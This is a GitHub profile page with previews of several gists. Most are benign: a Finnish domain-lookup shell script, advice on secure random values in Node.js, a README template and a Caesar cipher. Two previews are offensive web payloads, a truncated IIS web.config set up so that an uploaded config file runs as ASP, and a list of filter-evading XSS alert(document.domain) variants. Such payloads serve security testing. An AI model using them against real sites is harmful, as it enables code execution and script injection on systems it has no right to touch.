Skip to content

Instantly share code, notes, and snippets.

View midisfi's full-sized avatar

Mikko Saario midisfi

5 followers · 5 following
  • Finland
View GitHub Profile
@003random
003random / web.config
Last active March 11, 2023 13:49
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
@woltage
woltage / getdomains.sh
Last active January 18, 2024 12:57
Skripti jolla saa Y-tunnukella kaikki firman omistamat .fi -verkkotunnukset
## Y-Tunnukseen perustuva domainejen haku (.fi)
## Esimerkki: getdomains 1093944-1 # MTV Oy
# Laita tämä .bashrc tai .zshrc
# Käyttöesimerkkejä:
# Looppaa Y-tunnuksetn kaikki domainit läpi ja tee kysely
# for i in $(getdomains 1093944-1); do echo $i && host -t cname www.$i; done
@tomnomnom
tomnomnom / alert.js
Last active October 27, 2025 04:03
Ways to alert(document.domain)
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:
// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);
@joepie91
joepie91 / random.md
Last active November 1, 2025 17:37
Secure random values (in Node.js)

Not all random values are created equal - for security-related code, you need a specific kind of random value.

A summary of this article, if you don't want to read the entire thing:

  • Don't use Math.random(). There are extremely few cases where Math.random() is the right answer. Don't use it, unless you've read this entire article, and determined that it's necessary for your case.
  • Don't use crypto.getRandomBytes directly. While it's a CSPRNG, it's easy to bias the result when 'transforming' it, such that the output becomes more predictable.
  • If you want to generate random tokens or API keys: Use uuid, specifically the uuid.v4() method. Avoid node-uuid - it's not the same package, and doesn't produce reliably secure random values.
  • If you want to generate random numbers in a range: Use random-number-csprng.

You should seriously consider reading the entire article, though - it's

@PurpleBooth
PurpleBooth / README-Template.md
Last active October 31, 2025 20:49
A template to make good README.md

Project Title

One Paragraph of project description goes here

Getting Started

These instructions will get you a copy of the project up and running on your local machine for development and testing purposes. See deployment for notes on how to deploy the project on a live system.

Prerequisites

@EvanHahn
EvanHahn / gist:2587465
Last active October 9, 2023 01:26
Caesar shift in JavaScript
/*
JavaScript Caesar shift
by Evan Hahn (evanhahn.com)
"Encrypt" like this:
caesarShift('Attack at dawn!', 12); // Returns "Mffmow mf pmiz!"
And "decrypt" like this: